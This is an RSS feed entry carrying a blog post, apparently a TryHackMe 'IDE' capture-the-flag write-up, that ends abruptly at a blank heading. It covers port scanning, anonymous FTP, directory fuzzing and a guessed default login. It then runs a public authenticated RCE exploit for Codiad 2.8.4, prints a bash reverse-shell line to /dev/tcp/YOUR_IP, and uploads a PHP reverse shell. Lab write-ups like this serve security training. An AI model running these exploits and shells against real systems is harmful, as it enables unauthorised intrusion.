<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Krishna</title>
    <description>The latest articles on DEV Community by Krishna (@wandering-geek).</description>
    <link>https://dev.to/wandering-geek</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F190497%2F41a7f274-e467-47b2-adc2-3f9450619809.jpg</url>
      <title>DEV Community: Krishna</title>
      <link>https://dev.to/wandering-geek</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/wandering-geek"/>
    <language>en</language>
    <item>
      <title>TryHackme IDE Writeup</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Tue, 08 Nov 2022 10:57:54 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-ide-writeup-egp</link>
      <guid>https://dev.to/wandering-geek/tryhackme-ide-writeup-egp</guid>
      <description>&lt;p&gt;Link to machine page on TryHackme =&amp;gt; &lt;a href="https://tryhackme.com/room/ide"&gt;https://tryhackme.com/room/ide&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Enumeration
&lt;/h1&gt;

&lt;h2&gt;
  
  
  rustscan nmap
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;rustscan &lt;span class="nt"&gt;-a&lt;/span&gt; 10.10.134.57 &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt;    

Open 10.10.134.57:21
Open 10.10.134.57:22
Open 10.10.134.57:80
Open 10.10.134.57:62337

PORT      STATE SERVICE REASON  VERSION
21/tcp    open  ftp     syn-ack vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed &lt;span class="o"&gt;(&lt;/span&gt;FTP code 230&lt;span class="o"&gt;)&lt;/span&gt;
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:YOUR_IP
|      Logged &lt;span class="k"&gt;in &lt;/span&gt;as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session &lt;span class="nb"&gt;timeout &lt;/span&gt;&lt;span class="k"&gt;in &lt;/span&gt;seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-hostkey: 
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC94RvPaQ09Xx+jMj32opOMbghuvx4OeBVLc+/4Hascmrtsa+SMtQGSY7b+eyW8Zymxi94rGBIN2ydPxy3XXGtkaCdQluOEw5CqSdb/qyeH+L/1PwIhLrr+jzUoUzmQil+oUOpVMOkcW7a00BMSxMCij0HdhlVDNkWvPdGxKBviBDEKZAH0hJEfexz3Tm65cmBpMe7WCPiJGTvoU9weXUnO3+41Ig8qF7kNNfbHjTgS0+XTnDXk03nZwIIwdvP8dZ8lZHdooM8J9u0Zecu4OvPiC4XBzPYNs+6ntLziKlRMgQls0e3yMOaAuKfGYHJKwu4AcluJ/+g90Hr0UqmYLHEV
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBzKTu7YDGKubQ4ADeCztKu0LL5RtBXnjgjE07e3Go/GbZB2vAP2J9OEQH/PwlssyImSnS3myib+gPdQx54lqZU&lt;span class="o"&gt;=&lt;/span&gt;
|   256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ+oGPm8ZVYNUtX4r3Fpmcj9T9F2SjcRg4ansmeGR3cP
80/tcp    open  http    syn-ack Apache httpd 2.4.29 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open  http    syn-ack Apache httpd 2.4.29 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
|_http-title: Codiad 2.8.4
Service Info: OSs: Unix, Linux&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:linux:linux_kernel


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Web servers are running on both port 80 and 62337.&lt;/p&gt;

&lt;p&gt;On port 62337, there seems to be an application running - Codiad 2.8.4.&lt;/p&gt;

&lt;p&gt;Searching for it on Google yields this =&amp;gt; &lt;a href="https://github.com/Codiad/Codiad"&gt;https://github.com/Codiad/Codiad&lt;/a&gt;. Its a Cloud based IDE, hence the name of the machine I guess.&lt;/p&gt;

&lt;h2&gt;
  
  
  FTP Server Enum
&lt;/h2&gt;

&lt;p&gt;The server seems to be support anonymous login(from nmap output). Let's see what we can get from it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;ftp ide.thm
Connected to ide.thm.
220 &lt;span class="o"&gt;(&lt;/span&gt;vsFTPd 3.0.3&lt;span class="o"&gt;)&lt;/span&gt;
Name &lt;span class="o"&gt;(&lt;/span&gt;ide.thm:kali&lt;span class="o"&gt;)&lt;/span&gt;: Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system &lt;span class="nb"&gt;type &lt;/span&gt;is UNIX.
Using binary mode to transfer files.
ftp&amp;gt; &lt;span class="nb"&gt;ls
&lt;/span&gt;229 Entering Extended Passive Mode &lt;span class="o"&gt;(||&lt;/span&gt;|16569|&lt;span class="o"&gt;)&lt;/span&gt;
150 Here comes the directory listing.
226 Directory send OK.
ftp&amp;gt; &lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
229 Entering Extended Passive Mode &lt;span class="o"&gt;(||&lt;/span&gt;|24477|&lt;span class="o"&gt;)&lt;/span&gt;
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 18  2021 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
drwxr-xr-x    2 0        0            4096 Jun 18  2021 ...
226 Directory send OK.
ftp&amp;gt; &lt;span class="nb"&gt;cd&lt;/span&gt; ...
250 Directory successfully changed.
ftp&amp;gt; &lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
229 Entering Extended Passive Mode &lt;span class="o"&gt;(||&lt;/span&gt;|15019|&lt;span class="o"&gt;)&lt;/span&gt;
150 Here comes the directory listing.
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt;    1 0        0             151 Jun 18  2021 -
drwxr-xr-x    2 0        0            4096 Jun 18  2021 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
ftp&amp;gt; get -
&lt;span class="nb"&gt;local&lt;/span&gt;: - remote: -
229 Entering Extended Passive Mode &lt;span class="o"&gt;(||&lt;/span&gt;|16831|&lt;span class="o"&gt;)&lt;/span&gt;
150 Opening BINARY mode data connection &lt;span class="k"&gt;for&lt;/span&gt; - &lt;span class="o"&gt;(&lt;/span&gt;151 bytes&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
100% |&lt;span class="k"&gt;****************************************************************************************************************&lt;/span&gt;|   151      150.93 KiB/s    00:00 ETA
226 Transfer complete.
151 bytes received &lt;span class="k"&gt;in &lt;/span&gt;00:00 &lt;span class="o"&gt;(&lt;/span&gt;0.85 KiB/s&lt;span class="o"&gt;)&lt;/span&gt;
ftp&amp;gt; &lt;span class="nb"&gt;exit
&lt;/span&gt;221 Goodbye.

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After downloading it, let's rename THE &lt;code&gt;-&lt;/code&gt; file and see what's inside.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;kali㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~/Documents/ctf/thm_easy_ide]
└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;mv&lt;/span&gt; - ftp_file                      

└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;ftp_file            
Hey john,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file &lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
- drac.

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So there's two possible usernames &lt;code&gt;john&lt;/code&gt; and &lt;code&gt;drac&lt;/code&gt;. &lt;/p&gt;

&lt;h2&gt;
  
  
  Web Server Enum [Port 80]
&lt;/h2&gt;

&lt;p&gt;Let's see if we can find anything interesting here.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@ip-10-10-0-98:~/ide# ffuf &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt &lt;span class="nt"&gt;-u&lt;/span&gt; http://ide.thm/FUZZ &lt;span class="nt"&gt;-o&lt;/span&gt; ffuf/raftLarge &lt;span class="nt"&gt;-of&lt;/span&gt; html &lt;span class="nt"&gt;-ic&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-recursion&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz &lt;span class="nt"&gt;-sf&lt;/span&gt;

index.html              &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status           &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 272, Words: 20, Lines: 10]
.php                    &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 272, Words: 20, Lines: 10]
.html                   &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 272, Words: 20, Lines: 10]
                        &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376]
.html                   &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 272, Words: 20, Lines: 10]
.php                    &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 272, Words: 20, Lines: 10]
                        &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376]
index.html              &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376]

:: Progress: &lt;span class="o"&gt;[&lt;/span&gt;622750/622750] :: Job &lt;span class="o"&gt;[&lt;/span&gt;1/1] :: 10508 req/sec :: Duration: &lt;span class="o"&gt;[&lt;/span&gt;0:01:05] :: Errors: 30 ::

root@ip-10-10-0-98:~/ide# ffuf &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt &lt;span class="nt"&gt;-u&lt;/span&gt; http://ide.thm/FUZZ &lt;span class="nt"&gt;-o&lt;/span&gt; ffuf/big &lt;span class="nt"&gt;-of&lt;/span&gt; html &lt;span class="nt"&gt;-ic&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-recursion&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz &lt;span class="nt"&gt;-sf&lt;/span&gt;

:: Progress: &lt;span class="o"&gt;[&lt;/span&gt;204730/204730] :: Job &lt;span class="o"&gt;[&lt;/span&gt;1/1] :: 12140 req/sec :: Duration: &lt;span class="o"&gt;[&lt;/span&gt;0:00:22] :: Errors: 0 ::

root@ip-10-10-0-98:~/ide# ffuf &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt &lt;span class="nt"&gt;-u&lt;/span&gt; http://ide.thm/FUZZ &lt;span class="nt"&gt;-o&lt;/span&gt; ffuf/dirMedium &lt;span class="nt"&gt;-of&lt;/span&gt; html &lt;span class="nt"&gt;-ic&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-recursion&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz &lt;span class="nt"&gt;-sf&lt;/span&gt;

:: Progress: &lt;span class="o"&gt;[&lt;/span&gt;2076300/2076300] :: Job &lt;span class="o"&gt;[&lt;/span&gt;1/1] :: 3482 req/sec :: Duration: &lt;span class="o"&gt;[&lt;/span&gt;0:06:32] :: Errors: 0 ::

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing here at all for us it seems. Let's move on.&lt;/p&gt;

&lt;h2&gt;
  
  
  Web Server Enum [Port 62337]
&lt;/h2&gt;

&lt;p&gt;When we visit the site &lt;a href="http://ide.thm:62337"&gt;http://ide.thm:62337&lt;/a&gt;, there is a login portal.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;admin:admin&lt;/em&gt; does not work. Neither does &lt;em&gt;john:admin&lt;/em&gt; or &lt;em&gt;drac:admin&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;There are RCE exploits available for Codiad 2.8.4, but they require authentication. We will have to find a way to get the creds.&lt;/p&gt;

&lt;p&gt;In the mean time, let's fuzz the portal and see what we can find.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@ip-10-10-0-98:~/ide# ffuf &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt &lt;span class="nt"&gt;-u&lt;/span&gt; http://ide.thm:62337/FUZZ &lt;span class="nt"&gt;-o&lt;/span&gt; ffuf/raftLarge &lt;span class="nt"&gt;-of&lt;/span&gt; html &lt;span class="nt"&gt;-ic&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-recursion&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz &lt;span class="nt"&gt;-sf&lt;/span&gt;

js                      &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 3697, Words: 229, Lines: 30]
plugins                 &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 937, Words: 62, Lines: 17]
themes                  &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 1131, Words: 75, Lines: 18]
components              &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 3938, Words: 244, Lines: 32]
data                    &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 1944, Words: 134, Lines: 22]
lib                     &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 1173, Words: 78, Lines: 18]
config.php              &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 0, Words: 1, Lines: 1]
common.php              &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 0, Words: 1, Lines: 1]
languages               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 4609, Words: 305, Lines: 36]
index.php               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 5239, Words: 1739, Lines: 87]
INSTALL.txt             &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 634, Words: 93, Lines: 22]
workspace               &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 941, Words: 66, Lines: 17]
server-status           &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 275, Words: 20, Lines: 10]
.html                   &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 275, Words: 20, Lines: 10]
.php                    &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 275, Words: 20, Lines: 10]
                        &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 5239, Words: 1739, Lines: 87]
LICENSE.txt             &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 1133, Words: 191, Lines: 21]
style_guide.php         &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 24394, Words: 7692, Lines: 328]
.php                    &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 275, Words: 20, Lines: 10]
                        &lt;span class="o"&gt;[&lt;/span&gt;Status: 200, Size: 5239, Words: 1739, Lines: 87]
.html                   &lt;span class="o"&gt;[&lt;/span&gt;Status: 403, Size: 275, Words: 20, Lines: 10]

:: Progress: &lt;span class="o"&gt;[&lt;/span&gt;622750/622750] :: Job &lt;span class="o"&gt;[&lt;/span&gt;1/1] :: 9664 req/sec :: Duration: &lt;span class="o"&gt;[&lt;/span&gt;0:02:45] :: Errors: 30 ::
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Dir listing seems to be enabled. Some examples&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://ide.thm:62337/js/"&gt;http://ide.thm:62337/js/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://ide.thm:62337/data/"&gt;http://ide.thm:62337/data/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now I go back to the login page and take a guess at the password, since the notes in the FTP server mentioned "default password". &lt;/p&gt;

&lt;p&gt;&lt;code&gt;john:CENSORED&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;HINT:&lt;/em&gt; This is a very commonly used password and I got lucky when I guessed it.&lt;/p&gt;

&lt;p&gt;Now let's try and use those exploits to see if we can get some RCE.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;searchsploit codiad 2.8.4
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
 Exploit Title                                                                                                             |  Path
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
Codiad 2.8.4 - Remote Code Execution &lt;span class="o"&gt;(&lt;/span&gt;Authenticated&lt;span class="o"&gt;)&lt;/span&gt;                                                                       | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution &lt;span class="o"&gt;(&lt;/span&gt;Authenticated&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;                                                                   | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution &lt;span class="o"&gt;(&lt;/span&gt;Authenticated&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;3&lt;span class="o"&gt;)&lt;/span&gt;                                                                   | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution &lt;span class="o"&gt;(&lt;/span&gt;Authenticated&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;4&lt;span class="o"&gt;)&lt;/span&gt;                                                                   | multiple/webapps/50474.txt
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;--------------------------------&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Foothold
&lt;/h1&gt;

&lt;p&gt;Let's use this exploit =&amp;gt; &lt;a href="https://www.exploit-db.com/exploits/49705"&gt;https://www.exploit-db.com/exploits/49705&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Running the exploit.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;python3 49705.py http://10.10.180.194:62337/ john CENSORED YOUR_IP 4444 linux
&lt;span class="o"&gt;[&lt;/span&gt;+] Please execute the following &lt;span class="nb"&gt;command &lt;/span&gt;on your vps: 
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'bash -c "bash -i &amp;gt;/dev/tcp/YOUR_IP/4445 0&amp;gt;&amp;amp;1 2&amp;gt;&amp;amp;1"'&lt;/span&gt; | nc &lt;span class="nt"&gt;-lnvp&lt;/span&gt; 4444
nc &lt;span class="nt"&gt;-lnvp&lt;/span&gt; 4445
&lt;span class="o"&gt;[&lt;/span&gt;+] Please confirm that you have &lt;span class="k"&gt;done &lt;/span&gt;the two &lt;span class="nb"&gt;command &lt;/span&gt;above &lt;span class="o"&gt;[&lt;/span&gt;y/n]
&lt;span class="o"&gt;[&lt;/span&gt;Y/n] Y
&lt;span class="o"&gt;[&lt;/span&gt;+] Starting...
&lt;span class="o"&gt;[&lt;/span&gt;+] Login Content : &lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"status"&lt;/span&gt;:&lt;span class="s2"&gt;"success"&lt;/span&gt;,&lt;span class="s2"&gt;"data"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"username"&lt;/span&gt;:&lt;span class="s2"&gt;"john"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] Login success!
&lt;span class="o"&gt;[&lt;/span&gt;+] Getting writeable path...
&lt;span class="o"&gt;[&lt;/span&gt;+] Path Content : &lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"status"&lt;/span&gt;:&lt;span class="s2"&gt;"success"&lt;/span&gt;,&lt;span class="s2"&gt;"data"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"name"&lt;/span&gt;:&lt;span class="s2"&gt;"CloudCall"&lt;/span&gt;,&lt;span class="s2"&gt;"path"&lt;/span&gt;:&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\/&lt;/span&gt;&lt;span class="s2"&gt;var&lt;/span&gt;&lt;span class="se"&gt;\/&lt;/span&gt;&lt;span class="s2"&gt;www&lt;/span&gt;&lt;span class="se"&gt;\/&lt;/span&gt;&lt;span class="s2"&gt;html&lt;/span&gt;&lt;span class="se"&gt;\/&lt;/span&gt;&lt;span class="s2"&gt;codiad_projects"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] Writeable Path : /var/www/html/codiad_projects
&lt;span class="o"&gt;[&lt;/span&gt;+] Sending payload...

&lt;span class="nt"&gt;---&lt;/span&gt; &lt;span class="nt"&gt;---&lt;/span&gt;

└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'bash -c "bash -i &amp;gt;/dev/tcp/YOUR_IP/4445 0&amp;gt;&amp;amp;1 2&amp;gt;&amp;amp;1"'&lt;/span&gt; | nc &lt;span class="nt"&gt;-lnvp&lt;/span&gt; 4444
Ncat: Version 7.93 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org/ncat &lt;span class="o"&gt;)&lt;/span&gt;
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.180.194.
Ncat: Connection from 10.10.180.194:38116.

┌──&lt;span class="o"&gt;(&lt;/span&gt;kali㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~/Documents/ctf/thm_easy_ide]

&lt;span class="nt"&gt;---&lt;/span&gt; &lt;span class="nt"&gt;---&lt;/span&gt;

└─&lt;span class="nv"&gt;$ &lt;/span&gt;ncat &lt;span class="nt"&gt;-lnvp&lt;/span&gt; 4445                             
Ncat: Version 7.93 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org/ncat &lt;span class="o"&gt;)&lt;/span&gt;
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.180.194.
Ncat: Connection from 10.10.180.194:47536.
bash: cannot &lt;span class="nb"&gt;set &lt;/span&gt;terminal process group &lt;span class="o"&gt;(&lt;/span&gt;906&lt;span class="o"&gt;)&lt;/span&gt;: Inappropriate ioctl &lt;span class="k"&gt;for &lt;/span&gt;device
bash: no job control &lt;span class="k"&gt;in &lt;/span&gt;this shell
www-data@ide:/var/www/html/codiad/components/filemanager&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;id
id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;33&lt;span class="o"&gt;(&lt;/span&gt;www-data&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;33&lt;span class="o"&gt;(&lt;/span&gt;www-data&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;33&lt;span class="o"&gt;(&lt;/span&gt;www-data&lt;span class="o"&gt;)&lt;/span&gt;
www-data@ide:/var/www/html/codiad/components/filemanager&lt;span class="nv"&gt;$ &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, this process of starting a reverse shell is pretty complicated. So instead, I am gonna upload a reverse shell.&lt;/p&gt;

&lt;p&gt;Uploaded my own PHP reverse shell using &lt;code&gt;nc&lt;/code&gt;. Remember that dir listing is enabled. So we can access it directly at &lt;a href="http://ide.thm:62337/data/rshell.php"&gt;http://ide.thm:62337/data/rshell.php&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@ide:/var/www/html/codiad/data&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
total 36
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 www-data www-data   18 Jun 18  2021 README
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 www-data www-data  311 Nov  8 07:48 active.php
drwxr-xr-x 2 www-data www-data 4096 Nov  8 07:46 cache
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 www-data www-data   82 Jun 18  2021 projects.php
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 www-data www-data 5493 Nov  8 08:11 rshell.php
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 www-data www-data   52 Jun 18  2021 settings.php
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 www-data www-data  138 Nov  8 07:46 users.php
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 www-data www-data   79 Jun 18  2021 version.php

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We cannot read &lt;code&gt;user.txt&lt;/code&gt; in &lt;code&gt;/home/drac&lt;/code&gt;. We will need to find a way to pivot to the &lt;code&gt;drac&lt;/code&gt; user.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@ide:/home/drac&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
total 4
&lt;span class="nt"&gt;-r--------&lt;/span&gt; 1 drac drac 33 Jun 18  2021 user.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
